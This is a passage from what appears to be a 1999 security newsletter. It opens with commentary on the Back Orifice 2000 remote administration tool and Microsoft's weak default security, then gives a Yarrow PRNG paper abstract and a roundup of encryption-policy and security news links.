Okay, so who's to blame here? The Cult of the Dead Cow wrote and released Back Orifice. Surely the world is not a safer place because, as CDC's Sir Dystic put it: "every 14-year-old who wants to be a hacker will try it." BO2K's slogan is "show some control," and many will take that imperative seriously. Back Orifice will be used by lots of unethical people to do all sorts of unethical things. And that's not good.

On the other hand, Back Orifice can't do anything until the server portion is installed on some victim's computer. This means that the victim has to commit a security faux pas before anything else can happen. Not that this is very hard: lots of people network their computers to the Internet without adequate protection. An attacker can even ask the victim to install Back Orifice (social engineering might help); the Worm.ExploreZip worm of this spring did exactly that. Still, if the victim is sufficiently vigilant, he can never be attacked by Back Orifice.

But what about Microsoft's computing environment? One of the reasons Back Orifice is so nasty is that Microsoft doesn't design its operating systems to be secure. It never has. Any program that runs in Microsoft Windows 95 and 98 can do anything. In Unix, an attacker would first have to get root privileges. Not in Windows. There's no such thing as limited privileges, or administrator privileges, or root privileges. Microsoft assumes that anyone who can run a program can reformat the hard drive. This might have made some sense in the age of isolated desktop computers; after all, if you could run a program, you were standing in front of the machine. But on the Internet, this is absurd.

Windows NT was designed as a secure operating system, more or less. There are provisions to make Windows NT a very secure operating system, such as privilege levels in separate user accounts, file permissions, and kernel object access control lists. However, the configuration that makes Windows NT secure is very, very far and distant from the default installed configuration. Microsoft admits this. You have to make 300+ security checks and modifications to Windows NT to make it secure in its default configuration. And on top of this, Microsoft assumes that most users have Administrator access to their desktop machines anyway. They only really worry about network security, not host-end security, which is where they are seriously vulnerable to attacks like Back Orifice 2000. Windows NT could be secure, but Microsoft refuses to ship the OS in that condition (presumably they worry that their spiffy animated fading menu bars may be overlooked).

Malicious remote administration tools are a major security risk. What Back Orifice has done is made mainstream computer users aware of the danger. Maybe the world would have been safer had they not demonstrated the danger so graphically, but I am not sure. There are certainly other similar tools in the hacker world -- one, called BackDoor-G, has recently been discovered -- some developed with much more sinister purposes in mind. And Microsoft only responds to security threats if they are demonstrated.
Explain the threat in an academic paper and Microsoft denies it; release a hacking tool like Back Orifice, and suddenly they take the vulnerability seriously.

Back Orifice Home Page:
http://www.bo2k.com/

Commentary:
http://www.zdnet.com/zdnn/stories/news/0,4586,2127049,00.html
http://www.infoworld.com/cgi-bin/displayArchive.pl?/99/30/o03-30.36.htm

Microsoft's Systems Management Server:
http://www.microsoft.com/smsmgmt/techdetails/remote.asp

http://www.cultdeadcow.com/news/pr19990719.html

BackDoor-G:
http://www.zdnet.com/zdnn/stories/news/0,4586,2267379,00.html

** *** ***** ******* *********** *************

Counterpane -- Featured Research

"Notes on the Design and Analysis of the Yarrow Cryptographic Pseudorandom Number Generator"
J. Kelsey, B. Schneier, and N. Ferguson, Sixth Annual Workshop on Selected Areas in Cryptography, Springer Verlag, August 1999, to appear.

We describe the design of Yarrow, a family of cryptographic pseudo-random number generators (PRNG). We describe the concept of a PRNG as a separate cryptographic primitive, and the design principles used to develop Yarrow. We then discuss the ways that PRNGs can fail in practice, which motivates our discussion of the components of Yarrow and how they make Yarrow secure. Next, we define a specific instance of a PRNG in the Yarrow family that makes use of available technology today.

http://www.counterpane.com/yarrow-notes.html

** *** ***** ******* *********** *************

News

Major irony alert: President Clinton signs a bill into law using PGP.
http://www.wired.com/news/news/politics/story/20775.html

A new U.K. bill on e-commerce has the nasty provision that police will be able to demand access to encryption keys if they suspect criminal use of the Internet. Those who refuse get a two-year prison sentence.
http://www.wired.com/news/news/politics/story/20937.html
http://techweb.com/news/story/TWB19990726S0010
Text of the bill:
http://www.dti.gov.uk/cii/elec/ecbill.html
Foundation for Internet Policy Research commentary on the bill:
http://www.fipr.org/ecommpr.html

The first three chapters of Alan Turing's treatise on the Enigma, retyped from the only known paper copy, are available at:
http://home.cern.ch/~frode/crypto/Turing/index.html

The L0pht has released an anti-sniffer tool. It detects sniffers on networks. Unfortunately, at least one sniffer-detection-resistant sniffer has been released. And the race continues....
http://www.wired.com/news/news/technology/story/20913.html
L0pht:
http://www.l0pht.com/

The Information Society, an academic journal, published a special issue on anonymity and the Internet: vol. 15, no. 2. Actually, there are interesting articles in most of the back issues.
http://www.slis.indiana.edu/TIS/tables_of_contents/toc.html

The Encrypting File System (EFS) built into Microsoft Windows 2000 has been broken.
http://www.ntsecurity.net/forums/2cents/news.asp?IDF=118&TB=news
Microsoft claims that it has not, that the attack is predicated on the user doing something wrong: leaving the EFS recovery key on the machine.
http://www.microsoft.com/security/bulletins/win2kefs.asp
The author's reply:
http://www.ntsecurity.net/forums/2cents/GetMessage.asp?RootID=2092&ID=2102&IDF=118&TB=news
I reserve judgment, not having studied EFS, the attack, or Microsoft's response.

In late May, Janet Reno wrote to German Federal Secretary of Justice Herta Daubler-Gmelin, asking him to control the distribution of encryption software over the Internet.
http://www.heise.de/tp/deutsch/inhalt/te/5117/2.html

There's another version of Melissa floating around. This one uses the ".all" extensions in Microsoft Outlook to crash systems. Clever idea, actually.
http://www.computerworld.com/home/print.nsf/all/990719B50A

This rather impressive espionage device is being sold as a home consumer item:
http://www.x10.com/home/offer.cgi?!ZDX30,../1index761.htm

There has been considerable hoo-hah over a U.S. government plan to monitor private networks for intrusion, and invade a lot of privacy in the process. (This will all be at the consent of the various companies, so warrants are not required.) It's called Fidnet, for Federal Intrusion Detection Network.
http://www12.nytimes.com/library/tech/99/07/biztech/articles/28compute.html
http://www.zdnet.com/zdnn/stories/news/0,4586,2304083,00.html?chkpt=hpqs014
http://www.sjmercury.com/svtech/news/indepth/docs/secure072999.htm
http://techweb.com/wire/story/TWB19990729S0013
http://www.fcw.com/pubs/fcw/1999/0726/web-plan-7-29-99.html
http://www.infoworld.com/cgi-bin/displayStory.pl?990730.enstarwars.htm
EPIC's "Critical Infrastructure Protection and the Endangerment of Civil Liberties"
http://www.epic.org/security/infowar/epic-cip.html
Copy of the White House p